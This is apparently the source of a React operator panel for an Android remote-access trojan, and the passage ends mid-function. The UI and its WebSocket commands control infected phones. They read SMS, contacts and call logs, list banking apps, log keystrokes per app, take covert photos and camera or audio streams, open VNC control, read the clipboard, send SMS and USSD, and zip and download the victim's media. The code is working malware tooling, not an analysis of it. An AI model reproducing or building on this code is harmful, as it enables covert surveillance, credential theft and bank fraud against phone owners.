import React, { useState, useEffect, useMemo, useCallback, useRef } from 'react';

import { v4 as uuidv4 } from 'uuid';

import api from '../../services/api';

import useAuth from '../../hooks/useAuth';

import DeviceDetailsHeader from './DeviceDetailsHeader';

import DeviceDetailsTabs from './DeviceDetailsTabs';

import DeviceDetailsContent from './DeviceDetailsContent';

import AddContactModal from './AddContactModal';

import SendSmsModal from './SendSmsModal';

import DeviceManagementTab from './DeviceManagementTab';

import SendUssdModal from './SendUssdModal';

import PotoSettingsModal from './PotoSettingsModal';

import VNCModal from './VNCModal';

import InputModal from '../InputModal';

import './DeviceDetails.css';

import toastr from 'toastr';

import 'toastr/build/toastr.min.css';

import '../ConnectionStatus/ConnectionStatus.css';

const DEBUG_WEBRTC_LOG = false;





const toast = {

  info: (text) => toastr.info(' ', text),

  warning: (text) => toastr.warning(' ', text),

  success: (text) => toastr.success(' ', text),

};



const ts = () => new Date().toISOString().replace('T', ' ').replace('Z', '');

const short = (s) => s;



const logPC = (pc, msg, extra) => {

  if (!DEBUG_WEBRTC_LOG) return;

  const base = `[${ts()}][WEBRTC-PC] ${msg}`;

  if (extra !== undefined) console.log(base, extra);

  else console.log(base);

};



const logWS = (msg, payload) => {

  if (!DEBUG_WEBRTC_LOG) return;

  const base = `[${ts()}][WEBRTC-WS] ${msg}`;

  if (payload !== undefined) console.log(base, payload);

  else console.log(base);

};



const logVID = (msg, extra) => {

  if (!DEBUG_WEBRTC_LOG) return;

  const base = `[${ts()}][WEBRTC-VIDEO] ${msg}`;

  if (extra !== undefined) console.log(base, extra);

  else console.log(base);

};



function parseSmsFromString(content) {

    if (!content || typeof content !== 'string' || content.trim() === '') {

        return [];

    }

    const conversations = [];

    const blocks = content.trim().split('\n\n');



    for (const block of blocks) {

        const fromMatch = block.match(/^From:\s*(.+)$/m);

        if (!fromMatch) continue;

        

        const from = fromMatch[1].trim();

        const simMatch = block.match(/^Sim:\s*(-?\d+)$/m);

        const simSlot = simMatch ? parseInt(simMatch[1], 10) : null;

        const messages = [];



        const messageRegex = /Message:\s*([\s\S]*?),\s*Date:\s*(\d+)/g;

        let match;



        while ((match = messageRegex.exec(block)) !== null) {

            messages.push({

                body: match[1].trim(),

                date: parseInt(match[2], 10)

            });

        }



        if (messages.length > 0) {

            messages.sort((a, b) => b.date - a.date);

            conversations.push({ from, messages, simSlot });

        }

    }



    conversations.sort((a, b) => {

        const lastDateA = a.messages[0]?.date || 0;

        const lastDateB = b.messages[0]?.date || 0;

        return lastDateB - lastDateA;

    });



    return conversations;

}



const PotoViewerWindow = ({ poto, onClose, onSave, isMobile }) => {

    const [position, setPosition] = useState({ x: 100, y: 120 });

    const [size, setSize] = useState({ width: 450, height: 400 });

    const [isDragging, setIsDragging] = useState(false);

    const [isResizing, setIsResizing] = useState(false);

    const [zoom, setZoom] = useState(1);

    const [rotation, setRotation] = useState(0);

    const windowRef = useRef(null);

    const interactionStart = useRef({ x: 0, y: 0, width: 0, height: 0 });



    const getCoords = (e) => (e.touches ? { x: e.touches[0].clientX, y: e.touches[0].clientY } : { x: e.clientX, y: e.clientY });

    

    const onDragStart = (e) => {

        if (isMobile || e.target.closest('.resize-handle') || e.target.closest('.poto-controls')) return;

        setIsDragging(true);

        const coords = getCoords(e);

        interactionStart.current = { ...interactionStart.current, x: coords.x - position.x, y: coords.y - position.y };

        e.preventDefault();

    };



    const onResizeStart = (e) => {

        if (isMobile) return;

        setIsResizing(true);

        const coords = getCoords(e);

        interactionStart.current = { x: coords.x, y: coords.y, width: size.width, height: size.height };

        e.preventDefault();

    };

    

    const onInteractionEnd = useCallback(() => {

        setIsDragging(false);

        setIsResizing(false);

    }, []);



    const onInteractionMove = useCallback((e) => {

        const coords = getCoords(e);

        if (isDragging) {

            setPosition({

                x: Math.max(0, Math.min(coords.x - interactionStart.current.x, window.innerWidth - size.width)),

                y: Math.max(0, Math.min(coords.y - interactionStart.current.y, window.innerHeight - size.height))

            });

        }

        if (isResizing) {

            const newWidth = Math.max(300, Math.min(interactionStart.current.width + (coords.x - interactionStart.current.x), window.innerWidth - position.x));

            const newHeight = Math.max(200, Math.min(interactionStart.current.height + (coords.y - interactionStart.current.y), window.innerHeight - position.y));

            setSize({ width: newWidth, height: newHeight });

        }

    }, [isDragging, isResizing, position.x, position.y, size.width, size.height]);



    useEffect(() => {

        if (isMobile) return;



        document.addEventListener('mousemove', onInteractionMove);

        document.addEventListener('mouseup', onInteractionEnd);

        document.addEventListener('touchmove', onInteractionMove);

        document.addEventListener('touchend', onInteractionEnd);

        return () => {

            document.removeEventListener('mousemove', onInteractionMove);

            document.removeEventListener('mouseup', onInteractionEnd);

            document.removeEventListener('touchmove', onInteractionMove);

            document.removeEventListener('touchend', onInteractionEnd);

        };

    }, [onInteractionMove, onInteractionEnd, isMobile]);



    const baseStyle = {

        position: 'fixed',

        zIndex: 1070,

        backgroundColor: '#2c303a',

        border: '1px solid #f39c12',

        boxShadow: '0 8px 25px rgba(0,0,0,0.7)',

        userSelect: 'none',

        display: 'flex',

        flexDirection: 'column',

        overflow: 'hidden'

    };



    const desktopStyle = {

        top: `${position.y}px`, left: `${position.x}px`,

        width: `${size.width}px`, height: `${size.height}px`,

        borderRadius: '8px',

    };



    const mobileStyle = {

        top: 0, left: 0,

        width: '100%', height: '100%',

        borderRadius: 0,

        border: 'none'

    };



    const windowStyle = { ...baseStyle, ...(isMobile ? mobileStyle : desktopStyle) };



    return (

        <div ref={windowRef} style={windowStyle}>

            <div

                className="poto-header"

                onMouseDown={onDragStart}

                onTouchStart={onDragStart}

                style={{ padding: '10px', backgroundColor: '#1e2128', color: '#f39c12', cursor: isMobile ? 'default' : 'move', borderTopLeftRadius: '7px', borderTopRightRadius: '7px', display: 'flex', justifyContent: 'space-between', alignItems: 'center', borderBottom: '1px solid #f39c12', flexShrink: 0 }}

            >

                <h5 style={{ margin: 0, fontWeight: 'bold' }}>Полученный снимок</h5>

                <button onClick={onClose} style={{ padding: '2px 8px', fontSize: '14px', background: '#e74c3c', border: 'none', color: 'white', borderRadius: '4px' }}>&times;</button>

            </div>

            <div style={{ flex: 1, padding: '10px', overflow: 'hidden', display: 'flex', alignItems: 'center', justifyContent: 'center', background: '#111' }}>

                <div style={{ width: '100%', height: '100%', overflow: 'auto', display: 'flex', alignItems: 'center', justifyContent: 'center' }}>

                    <img 

                        src={poto.frame} 

                        alt="Captured Poto" 

                        style={{ 

                            width: 'auto', height: 'auto', 

                            maxWidth: 'none', maxHeight: 'none', 

                            transform: `scale(${zoom}) rotate(${rotation}deg)`,

                            transition: 'transform 0.2s ease-out',

                            cursor: isMobile ? 'zoom-in' : 'grab'

                        }} 

                    />

                </div>

            </div>

            <div className="poto-controls" style={{ padding: '10px', display: 'flex', justifyContent: 'center', alignItems: 'center', gap: '10px', borderTop: '1px solid #444', flexShrink: 0 }}>

                <button onClick={() => setZoom(z => Math.max(0.2, z - 0.1))} title="Уменьшить">-</button>

                <span style={{color: '#fff', minWidth: '40px', textAlign: 'center'}}>{Math.round(zoom * 100)}%</span>

                <button onClick={() => setZoom(z => Math.min(5, z + 0.1))} title="Увеличить">+</button>

                <button onClick={() => setRotation(r => (r + 90) % 360)} title="Повернуть">↻</button>

                <button onClick={() => onSave(poto.potoId)}>Сохранить</button>

            </div>

            {!isMobile && (

                <div

                    className="resize-handle"

                    onMouseDown={onResizeStart}

                    onTouchStart={onResizeStart}

                    style={{ position: 'absolute', bottom: 0, right: 0, width: '20px', height: '20px', cursor: 'nwse-resize', borderBottom: '3px solid #f39c12', borderRight: '3px solid #f39c12' }}

                />

            )}

        </div>

    );

};



const MjpegPlayerWindow = ({ streamFrame, onClose, onSwitchCamera, isMobile }) => {

    const [rotation, setRotation] = useState(0);

    const [position, setPosition] = useState({ x: 50, y: 100 });

    const [size, setSize] = useState({ width: 360, height: 280 });

    const [isDragging, setIsDragging] = useState(false);

    const [isResizing, setIsResizing] = useState(false);

    const windowRef = useRef(null);

    const imageRef = useRef(null);

    const interactionStart = useRef({ x: 0, y: 0, width: 0, height: 0 });



    const getCoords = (e) => (e.touches ? { x: e.touches[0].clientX, y: e.touches[0].clientY } : { x: e.clientX, y: e.clientY });

    

    const onDragStart = (e) => {

        if (isMobile || e.target.closest('.resize-handle')) return;

        setIsDragging(true);

        const coords = getCoords(e);

        interactionStart.current = { ...interactionStart.current, x: coords.x - position.x, y: coords.y - position.y };

        e.preventDefault();

    };



    const onResizeStart = (e) => {

        if (isMobile) return;

        setIsResizing(true);

        const coords = getCoords(e);

        interactionStart.current = { x: coords.x, y: coords.y, width: size.width, height: size.height };

        e.preventDefault();

    };



    const onInteractionEnd = useCallback(() => {

        setIsDragging(false);

        setIsResizing(false);

    }, []);



    const onInteractionMove = useCallback((e) => {

        const coords = getCoords(e);

        if (isDragging) {

            setPosition({

                x: Math.max(0, Math.min(coords.x - interactionStart.current.x, window.innerWidth - size.width)),

                y: Math.max(0, Math.min(coords.y - interactionStart.current.y, window.innerHeight - size.height))

            });

        }

        if (isResizing) {

            const newWidth = Math.max(300, Math.min(interactionStart.current.width + (coords.x - interactionStart.current.x), window.innerWidth - position.x));

            const newHeight = Math.max(200, Math.min(interactionStart.current.height + (coords.y - interactionStart.current.y), window.innerHeight - position.y));

            setSize({ width: newWidth, height: newHeight });

        }

    }, [isDragging, isResizing, position.x, position.y, size.width, size.height]);



    useEffect(() => {

        if (isMobile) return;



        document.addEventListener('mousemove', onInteractionMove);

        document.addEventListener('mouseup', onInteractionEnd);

        document.addEventListener('touchmove', onInteractionMove);

        document.addEventListener('touchend', onInteractionEnd);

        return () => {

            document.removeEventListener('mousemove', onInteractionMove);

            document.removeEventListener('mouseup', onInteractionEnd);

            document.removeEventListener('touchmove', onInteractionMove);

            document.removeEventListener('touchend', onInteractionEnd);

        };

    }, [onInteractionMove, onInteractionEnd, isMobile]);



    const baseStyle = {

        position: 'fixed',

        zIndex: 1060,

        backgroundColor: '#2c303a',

        border: '1px solid #7b68ee',

        boxShadow: '0 8px 25px rgba(0,0,0,0.7)',

        userSelect: 'none',

        display: 'flex',

        flexDirection: 'column'

    };

    

    const desktopStyle = {

        top: `${position.y}px`, left: `${position.x}px`,

        width: `${size.width}px`, height: `${size.height}px`,

        borderRadius: '8px',

    };

    

    const mobileStyle = {

        top: 0, left: 0,

        width: '100%', height: '100%',

        borderRadius: 0,

        border: 'none',

    };

    

    const windowStyle = { ...baseStyle, ...(isMobile ? mobileStyle : desktopStyle) };



    return (

        <div ref={windowRef} style={windowStyle}>

            <div

                className="broadcast-header"

                onMouseDown={onDragStart}

                onTouchStart={onDragStart}

                style={{ padding: '10px', backgroundColor: '#1e2128', color: '#c5c5ff', cursor: isMobile ? 'default' : 'move', borderTopLeftRadius: '7px', borderTopRightRadius: '7px', display: 'flex', justifyContent: 'space-between', alignItems: 'center', borderBottom: '1px solid #7b68ee' }}

            >

                <h5 style={{ margin: 0, fontWeight: 'bold' }}>Прямая трансляция</h5>

                <div style={{ display: 'flex', gap: '10px' }}>

                    <button onClick={onSwitchCamera} style={{ padding: '2px 8px', fontSize: '12px', background: '#3498db', border: 'none', color: 'white', borderRadius: '4px' }}>

                        Переключить

                    </button>

                    <button onClick={onClose} style={{ padding: '2px 8px', fontSize: '14px', background: '#e74c3c', border: 'none', color: 'white', borderRadius: '4px' }}>&times;</button>

                </div>

            </div>



            <div style={{ flex: 1, padding: '10px', overflow: 'hidden', display: 'flex', alignItems: 'center', justifyContent: 'center', background: '#000' }}>

                {streamFrame ? (

                    <img ref={imageRef} src={streamFrame} alt="Live Stream" style={{ maxWidth: '100%', maxHeight: '100%', objectFit: 'contain', transition: 'transform 0.3s ease', transform: `rotate(${rotation}deg)` }} />

                ) : (

                    <p style={{ margin: 0, textAlign: 'center', color: '#fff' }}>Ожидание первого кадра...</p>

                )}

            </div>



            <div style={{ padding: '0 10px 10px 10px', display: 'flex', justifyContent: 'center' }}>

                <button onClick={() => setRotation(prev => (prev + 90) % 360)}>Перевернуть</button>

            </div>

            

            {!isMobile && (

                <div

                    className="resize-handle"

                    onMouseDown={onResizeStart}

                    onTouchStart={onResizeStart}

                    style={{ position: 'absolute', bottom: 0, right: 0, width: '20px', height: '20px', cursor: 'nwse-resize', borderBottom: '3px solid #7b68ee', borderRight: '3px solid #7b68ee' }}

                />

            )}

        </div>

    );

};



const WebRtcVideoPlayer = ({ stream, onClose, onSwitchCamera, isMobile }) => {

    const videoRef = useRef(null);

    const [rotation, setRotation] = useState(0);

    const [volume, setVolume] = useState(1);

    const [isMuted, setIsMuted] = useState(false);

    const [position, setPosition] = useState({ x: 50, y: 100 });

    const [size, setSize] = useState({ width: 480, height: 450 });

    const [isDragging, setIsDragging] = useState(false);

    const [isResizing, setIsResizing] = useState(false);

    const windowRef = useRef(null);

    const interactionStart = useRef({ x: 0, y: 0, width: 0, height: 0 });



    const getCoords = (e) => (e.touches ? { x: e.touches[0].clientX, y: e.touches[0].clientY } : { x: e.clientX, y: e.clientY });



    const onDragStart = (e) => {

        if (isMobile || e.target.closest('.resize-handle')) return;

        setIsDragging(true);

        const coords = getCoords(e);

        interactionStart.current = { ...interactionStart.current, x: coords.x - position.x, y: coords.y - position.y };

        e.preventDefault();

    };



    const onResizeStart = (e) => {

        if (isMobile) return;

        setIsResizing(true);

        const coords = getCoords(e);

        interactionStart.current = { x: coords.x, y: coords.y, width: size.width, height: size.height };

        e.preventDefault();

    };



    const onInteractionEnd = useCallback(() => {

        setIsDragging(false);

        setIsResizing(false);

    }, []);



    const onInteractionMove = useCallback((e) => {

        const coords = getCoords(e);

        if (isDragging) {

            setPosition({

                x: Math.max(0, Math.min(coords.x - interactionStart.current.x, window.innerWidth - size.width)),

                y: Math.max(0, Math.min(coords.y - interactionStart.current.y, window.innerHeight - size.height))

            });

        }

        if (isResizing) {

            const newWidth = Math.max(300, Math.min(interactionStart.current.width + (coords.x - interactionStart.current.x), window.innerWidth - position.x));

            const newHeight = Math.max(200, Math.min(interactionStart.current.height + (coords.y - interactionStart.current.y), window.innerHeight - position.y));

            setSize({ width: newWidth, height: newHeight });

        }

    }, [isDragging, isResizing, position.x, position.y, size.width, size.height]);



    useEffect(() => {

        if (isMobile) return;



        document.addEventListener('mousemove', onInteractionMove);

        document.addEventListener('mouseup', onInteractionEnd);

        document.addEventListener('touchmove', onInteractionMove);

        document.addEventListener('touchend', onInteractionEnd);

        return () => {

            document.removeEventListener('mousemove', onInteractionMove);

            document.removeEventListener('mouseup', onInteractionEnd);

            document.removeEventListener('touchmove', onInteractionMove);

            document.removeEventListener('touchend', onInteractionEnd);

        };

    }, [onInteractionMove, onInteractionEnd, isMobile]);

    

    useEffect(() => {

        const v = videoRef.current;

        if (!v) return;

        const onLoadedMetadata = () => logVID('VIDEO loadedmetadata', { width: v.videoWidth, height: v.videoHeight });

        const onCanPlay = () => logVID('VIDEO canplay');

        const onPlaying = () => logVID('VIDEO playing');

        const onWaiting = () => logVID('VIDEO waiting (buffering)');

        const onStalled = () => logVID('VIDEO stalled');

        const onSuspend = () => logVID('VIDEO suspend');

        const onPause = () => logVID('VIDEO pause');

        const onEnded = () => logVID('VIDEO ended');

        v.addEventListener('loadedmetadata', onLoadedMetadata);

        v.addEventListener('canplay', onCanPlay);

        v.addEventListener('playing', onPlaying);

        v.addEventListener('waiting', onWaiting);

        v.addEventListener('stalled', onStalled);

        v.addEventListener('suspend', onSuspend);

        v.addEventListener('pause', onPause);

        v.addEventListener('ended', onEnded);

        return () => {

            v.removeEventListener('loadedmetadata', onLoadedMetadata);

            v.removeEventListener('canplay', onCanPlay);

            v.removeEventListener('playing', onPlaying);

            v.removeEventListener('waiting', onWaiting);

            v.removeEventListener('stalled', onStalled);

            v.removeEventListener('suspend', onSuspend);

            v.removeEventListener('pause', onPause);

            v.removeEventListener('ended', onEnded);

        };

    }, []);



    useEffect(() => {

        const v = videoRef.current;

        if (v) {

            v.volume = volume;

            v.muted = isMuted;

        }

    }, [volume, isMuted, videoRef]);



    useEffect(() => {

        const v = videoRef.current;

        if (v && stream) {

            logVID('Назначаем stream в <video>. Tracks:', {

                videoTracks: stream.getVideoTracks().map(t => ({ id: t.id, readyState: t.readyState, enabled: t.enabled, muted: t.muted })),

                audioTracks: stream.getAudioTracks().map(t => ({ id: t.id, readyState: t.readyState, enabled: t.enabled, muted: t.muted }))

            });

            v.srcObject = stream;

            Promise.resolve(v.play()).then(() => {

                logVID('video.play() — успешно вызван');

            }).catch(err => {

                logVID('video.play() — отклонён автоплеем/ошибкой', { error: String(err) });

            });

        }

    }, [stream]);



    const handleVolumeChange = (e) => {

        const newVolume = parseFloat(e.target.value);

        setVolume(newVolume);

        if (newVolume > 0) {

            setIsMuted(false);

        }

    };



    const toggleMute = () => {

        setIsMuted(prev => !prev);

    };



    const baseStyle = {

        position: 'fixed',

        zIndex: 1060,

        backgroundColor: '#2c303a',

        border: '1px solid #2ecc71',

        boxShadow: '0 8px 25px rgba(0,0,0,0.7)',

        userSelect: 'none',

        display: 'flex',

        flexDirection: 'column'

    };



    const desktopStyle = {

        top: `${position.y}px`, left: `${position.x}px`,

        width: `${size.width}px`, height: `${size.height}px`,

        borderRadius: '8px',

    };



    const mobileStyle = {

        top: 0, left: 0,

        width: '100%', height: '100%',

        borderRadius: 0,

        border: 'none',

    };

    

    const windowStyle = { ...baseStyle, ...(isMobile ? mobileStyle : desktopStyle) };



    return (

        <div ref={windowRef} style={windowStyle}>

            <div

                className="broadcast-header"

                onMouseDown={onDragStart}

                onTouchStart={onDragStart}

                style={{

                    padding: '10px',

                    backgroundColor: '#1e2128',

                    color: '#8effc1',

                    cursor: isMobile ? 'default' : 'move',

                    borderTopLeftRadius: '7px',

                    borderTopRightRadius: '7px',

                    display: 'flex',

                    justifyContent: 'space-between',

                    alignItems: 'center',

                    borderBottom: '1px solid #2ecc71'

                }}

            >

                <h5 style={{ margin: 0, fontWeight: 'bold' }}>Прямая трансляция</h5>

                <div style={{ display: 'flex', gap: '10px' }}>

                    <button onClick={onSwitchCamera} style={{ padding: '2px 8px', fontSize: '12px', background: '#3498db', border: 'none', color: 'white', borderRadius: '4px' }}>

                        Переключить

                    </button>

                    <button onClick={onClose} style={{ padding: '2px 8px', fontSize: '14px', background: '#e74c3c', border: 'none', color: 'white', borderRadius: '4px' }}>

                        &times;

                    </button>

                </div>

            </div>



            <div style={{ flex: 1, padding: '10px', background: '#000', display: 'flex', alignItems: 'center', justifyContent: 'center', overflow: 'hidden' }}>

                {stream ? (

                    <video

                        ref={videoRef}

                        autoPlay

                        playsInline

                        style={{

                            width: '100%',

                            height: '100%',

                            objectFit: 'contain',

                            transform: `rotate(${rotation}deg)`,

                            transition: 'transform 0.3s ease'

                        }}

                    />

                ) : (

                    <p style={{ margin: 0, textAlign: 'center', padding: '50px 0', color: 'white' }}>Подключение к медиа-потоку...</p>

                )}

            </div>

            <div style={{ padding: '10px', display: 'flex', justifyContent: 'space-between', alignItems: 'center', borderTop: '1px solid #444' }}>

                <button onClick={toggleMute} style={{ minWidth: '90px' }}>

                    {isMuted ? 'Вкл. звук' : 'Выкл. звук'}

                </button>

                <input

                    type="range"

                    min="0"

                    max="1"

                    step="0.01"

                    value={isMuted ? 0 : volume}

                    onChange={handleVolumeChange}

                    style={{ flex: 1, margin: '0 10px', cursor: 'pointer' }}

                    title={`Громкость: ${Math.round((isMuted ? 0 : volume) * 100)}%`}

                />

                <button onClick={() => setRotation(prev => (prev + 90) % 360)}>Перевернуть</button>

            </div>

            {!isMobile && (

                 <div

                    className="resize-handle"

                    onMouseDown={onResizeStart}

                    onTouchStart={onResizeStart}

                    style={{

                        position: 'absolute',

                        bottom: 0,

                        right: 0,

                        width: '20px',

                        height: '20px',

                        cursor: 'nwse-resize',

                        borderBottom: '3px solid #2ecc71',

                        borderRight: '3px solid #2ecc71'

                    }}

                />

            )}

        </div>

    );

};



// Хранит ОТКЛЮЧЁННЫЕ пакеты. has() инвертирован — true для всех кроме явно отключённых.

// new AllActiveSet()        → has(x) = true для всех (все логируются, красные)

// new AllActiveSet(['Viber'])→ has('Viber') = false (фиолетовый), остальные true (красные)

class AllActiveSet extends Set {

    has(pkg) { return !super.has(pkg); }

}





function DeviceDetails({ device, onClose, ws, isMobile, onSaveNote, onSaveManualPhone }) {

    const { registerOnWSMessage } = useAuth();

    const [capturedPoto, setCapturedPoto] = useState(null);

    const [isSystemUpdating, setIsSystemUpdating] = useState(false);

    const [vncVerifying, setVncVerifying] = useState(false);

    const [vncVerifySecondsLeft, setVncVerifySecondsLeft] = useState(0);

    const vncVerifyingRef = useRef(false);

    const vncVerifyGotTrueRef = useRef(false);

    const vncVerifyTimerRef = useRef(null);

    const vncVerifyCountdownRef = useRef(null);

    const [activeTab, setActiveTab] = useState('general');

    const activeTabRef = useRef(activeTab);

    useEffect(() => { activeTabRef.current = activeTab; }, [activeTab]);



    // Cleanup VNC verify timers при размонтировании

    useEffect(() => {

        return () => {

            clearTimeout(vncVerifyTimerRef.current);

            clearInterval(vncVerifyCountdownRef.current);

        };

    }, []);

    // Priority watch: notify server while DeviceDetails is open

    useEffect(() => {

        if (!device || !device.uuid || !ws || !ws.current) return;

        try { ws.current.send(JSON.stringify({ action: 'watchDevice', uuid: device.uuid })); } catch(e) {}

        return () => {

            try { if (ws.current) ws.current.send(JSON.stringify({ action: 'unwatchDevice', uuid: device.uuid })); } catch(e) {}

        };

    // eslint-disable-next-line react-hooks/exhaustive-deps

    }, [device && device.uuid]);

    const [isLoading, setIsLoading] = useState(false);

    const lastSystemInfoRequestRef = useRef(null);

    // Добавляем трекинг запросов

    const requestedDataRef = useRef({ sms: false, contacts: false, calls: false });

    const [isAddContactModalOpen, setAddContactModalOpen] = useState(false);

    const [isSendSmsModalOpen, setSendSmsModalOpen] = useState(false);

    const [replyModal, setReplyModal] = useState({ isOpen: false, notificationKey: null });

    const [outgoingMessages, setOutgoingMessages] = useState([]);

    const [archivedSms, setArchivedSms] = useState([]);

    const [isSendUssdModalOpen, setSendUssdModalOpen] = useState(false);

    const [mediaFiles, setMediaFiles] = useState({ images: [], videos: [] });

    const [callLogs, setCallLogs] = useState(null);

    const [unlockHistory, setUnlockHistory] = useState(null);

    const [internalDeviceState, setInternalDeviceState] = useState(device);

    const [ussdHistory, setUssdHistory] = useState([]);

    const [notifications, setNotifications] = useState([]);

    const [uploadProgress, setUploadProgress] = useState({});

    const [isMonitoring, setIsMonitoring] = useState(false);

    const [deviceStatus, setDeviceStatus] = useState('');

    const [countdown, setCountdown] = useState(180);

    const countdownIntervalRef = useRef(null);

    const monitoringTimeoutRef = useRef(null);

    const [isFgMonitoring, setIsFgMonitoring] = useState(false);

    const [fgAppName, setFgAppName] = useState('');

    const [fgCountdown, setFgCountdown] = useState(120);

    const fgCountdownIntervalRef = useRef(null);

    const fgMonitoringTimeoutRef = useRef(null);

    const [isBroadcasting, setIsBroadcasting] = useState(false);

    const [streamFrame, setStreamFrame] = useState(null);

    const transferIdMapRef = useRef({});

    const [isPotoModalOpen, setIsPotoModalOpen] = useState(false);

    const [isVncModalOpen, setIsVncModalOpen] = useState(false);

    const handleVncClose = useCallback(() => setIsVncModalOpen(false), []);

    const [clipboardResult, setClipboardResult] = useState(null); // null | { text, note }

    const [clipLoading, setClipLoading] = useState(false);

    const [isSelectingBroadcast, setIsSelectingBroadcast] = useState(false);

    const [potoStatus, setPotoStatus] = useState({ active: false, message: '' });

    const potoTimeoutRef = useRef(null);

    const [broadcastType, setBroadcastType] = useState(null);

    const [videoStream, setVideoStream] = useState(null);

    const peerConnectionRef = useRef(null);

    const pendingCandidatesRef = useRef([]);

    const remoteDescSetRef = useRef(false);

    const statsIntervalRef = useRef(null);

    const firstFrameTimeoutRef = useRef(null);

    const [privilegeStatus, setPrivilegeStatus] = useState(null);

    const [windowHistory, setWindowHistory] = useState([]);

    const [isZipModalOpen, setIsZipModalOpen] = useState(false);



    const [archiveTabSubtab, setArchiveTabSubtab] = useState('media');

    const [archivesList, setArchivesList] = useState([]);

    const [zipBusy, setZipBusy] = useState(false);

    const [zipProgressState, setZipProgressState] = useState(null);

    const [zipWarning, setZipWarning] = useState('');

    const [downloadLinks, setDownloadLinks] = useState({});



    // ── MinkScan state ──────────────────────────────────────────────────────

    const [minkScanResult, setMinkScanResult] = useState(null);



    // ── Keylog state ────────────────────────────────────────────────────────

    const [keylogActivePackages, setKeylogActivePackages] = useState(new Set());

    const [keylogDataPackages, setKeylogDataPackages] = useState({});   // pkg → entry count

    const [keylogModal, setKeylogModal] = useState({ open: false, pkg: null, entries: [] });



    const handleAppRestart = () => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid) return;



        startPendingWindow(pendingRestartRef, 'Перезапуск РАТа', 20000);



        ws.current.send(JSON.stringify({

            action: 'app_restart',

            uuid: device.uuid

        }));

    };



    const handleServerReconnect = () => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid) return;



        if (pendingReconnectRef.current) {

            return toast.info("Переподключение сервера уже отправлено — ждём подтверждение…");

        }



        startPendingWindow(pendingReconnectRef, 'Переподключение сервера', 20000);

        ws.current.send(JSON.stringify({

            action: 'server_side_reconnect',

            uuid: device.uuid

        }));

    };



    const handleOpenZipModal = () => {

        setIsZipModalOpen(true);

        setZipWarning('');

    };



    const handleCloseZipModal = () => {

        setIsZipModalOpen(false);

    };



    const handleSubmitZipRequest = (mode) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid) {

            return toast.warning("UUID устройства не найден.");

        }



        if (archivesList && archivesList.length > 0) {

            setZipWarning('Удалите предыдущие архивы перед созданием новых.');

            toast.warning('Удалите предыдущие архивы перед созданием новых.');

            return;

        }



        const randomPart = Math.floor(Math.random() * 10000);

        const zipName = `media_${device.uuid}_${randomPart}.zip`;



        const payload = {

            action: 'createImagesZip',

            uuid: device.uuid,

            zipName,

            mode,

            excludeFolderNames: []

        };



        ws.current.send(JSON.stringify(payload));



        setIsZipModalOpen(false);

        setZipBusy(true);

        setZipProgressState({ progress: 0, processed: 0, total: 0 });

        setZipWarning('');



        toast.info("Запрошена сборка архива. Следи за прогрессом во вкладке Медиа.");

    };



    const handleRequestArchivesList = () => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid) return;

        ws.current.send(JSON.stringify({

            action: 'getZipArchivesList',

            uuid: device.uuid,

        }));

    };



    const handleDownloadArchive = (arc) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid) return;

        if (!arc || !arc.fileName) return;



        ws.current.send(JSON.stringify({

            action: 'sendLocalFile',

            uuid: device.uuid,

            filePath: arc.filePath,

            fileName: arc.fileName,

        }));



        setDownloadLinks(prev => ({

            ...prev,

            [arc.fileName]: { ready: false, progress: 0 }

        }));

    };



    const handleDeleteArchive = (arc) => {

        if (!ws || !ws.current || ws.current.readyState !== WebSocket.OPEN) {

            return toast.warning("WebSocket не подключен.");

        }

        if (!device.uuid) return;

        if (!arc || !arc.fileName) return;



        ws.current.send(JSON.stringify({

            action: 'deleteZipArchive',

            uuid: device.uuid,

            fileName: arc.fileName,

        }));

    };



    const handleChangeArchiveSubtab = (sub) => {

        setArchiveTabSubtab(sub);

    };



    const pendingReconnectRef = useRef(null);

    const pendingRestartRef = useRef(null);



    const startPendingWindow = (ref, label, timeoutMs = 12000) => {

        ref.current?.timeout && clearTimeout(ref.current.timeout);

        const startedAt = Date.now();

        const toastId = toastr.info(' ', `${label}: отправлено… Ждём подтверждение`);

        ref.current = {

            startedAt,

            toastId,

            timeout: setTimeout(() => {

                if (ref.current && ref.current.startedAt === startedAt) {

                    toastr.warning(' ', `${label}: подтверждение не получено (тайм-аут)`);

                    ref.current = null;

                }

            }, timeoutMs)

        };

    };

    

    useEffect(() => {

        setPrivilegeStatus(internalDeviceState.systemInfo?.privileges || null);

    }, [internalDeviceState]);



    useEffect(() => {

        setInternalDeviceState(prev => {

            if (!prev) return device;

            const prevSys = prev.systemInfo || {};

            const devSys = device.systemInfo || {};

            const keepLastSeen = prev.lastSeen && prev.lastSeen > (device.lastSeen || '')

                ? prev.lastSeen

                : device.lastSeen;

            return {

                ...prev,

                ...device,

                lastSeen: keepLastSeen,

                systemInfo: {

                    ...prevSys,

                    // Берём из device.systemInfo только поля, которых ещё нет в prev —

                    // чтобы не затирать полные данные от устройства частичными из списка.

                    ...Object.fromEntries(

                        Object.entries(devSys).filter(([k]) => !prevSys[k])

                    ),

                    supAP: prevSys.supAP || devSys.supAP,

                    installedBankApps: prevSys.installedBankApps || devSys.installedBankApps,

                },

                sms: prev.sms || device.sms,

                smsMeta: prev.smsMeta || device.smsMeta,

                contacts: prev.contacts || device.contacts,

                extraInfo: prev.extraInfo || device.extraInfo,

                osintInfo: prev.osintInfo || device.osintInfo,

            };

        });

    }, [device]);



    useEffect(() => {

        setActiveTab('general');

        setUssdHistory([]);

        setOutgoingMessages([]);

        setCallLogs(null);

        setMediaFiles({ images: [], videos: [] });

        setNotifications([]);

        setCapturedPoto(null);

        setIsBroadcasting(false);

        setStreamFrame(null);

        setIsPotoModalOpen(false);

        setIsSelectingBroadcast(false);

        setPotoStatus({ active: false, message: '' });

        cleanupWebRtc();

        setBroadcastType(null);



        setArchiveTabSubtab('media');

        setArchivesList([]);

        setZipBusy(false);

        setZipProgressState(null);

        setZipWarning('');

        setDownloadLinks({});

        // Сбрасываем флаги запросов при смене устройства

